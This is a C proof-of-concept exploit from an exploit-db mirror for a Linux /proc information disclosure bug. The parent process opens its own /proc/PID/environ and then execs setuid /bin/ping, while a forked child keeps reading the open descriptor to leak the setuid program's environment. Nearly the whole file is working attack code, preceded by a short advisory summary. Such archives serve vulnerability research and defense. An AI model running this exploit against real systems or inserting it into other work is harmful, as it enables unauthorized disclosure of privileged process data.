exploit-db-mirror/exploits/linux/local/22813.c

/*
source: https://www.securityfocus.com/bid/8002/info

A potential information disclosure vulnerability has been reported for the Linux /proc filesystem, specifically when invoking setuid applications. As a result, an unprivileged user may be able to read the contents of a setuid application's environment data. This could potentially, although unlikely, result in the disclosure of sensitive information, such as restricted file path information.
*/

/****************************************************************
*                                                               *
*       Linux /proc information disclosure PoC                  *
*       by IhaQueR                                              *
*                                                               *
****************************************************************/



#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>



static char buf[128];



void fatal(const char *msg)
{
    printf("\n");
    if (!errno) {
        fprintf(stderr, "FATAL: %s\n", msg);
    } else {
        perror(msg);
    }

    printf("\n");
    fflush(stdout);
    fflush(stderr);
    exit(129);
}


int main()
{
    int fd, r;
    char c;

    sprintf(buf, "/proc/%d/environ", getpid());
    fd = open(buf, O_RDONLY);
    if (fd > 0) {
        sprintf(buf, "/proc/%d", getpid());
        if (fork()) {
            printf("\nparent executing setuid\n");
            fflush(stdout);
            execl("/bin/ping", "ping", "-c", "3", "127.0.0.1", NULL);
            fatal("execl");
        } else {
            sleep(1);
            printf("\nchild reads parent's proc:\n");
            fflush(stdout);
            while (1) {
                r = read(fd, &c, 1);
                if (r <= 0)
                    break;
                printf("%c", c);
            }
            printf("\n\nContent of %s\n", buf);
            fflush(stdout);
            execl("/bin/ls", "ls", "-l", buf, NULL);
        }
    } else
        fatal("open proc");

    printf("\n");
    fflush(stdout);

    return 0;
}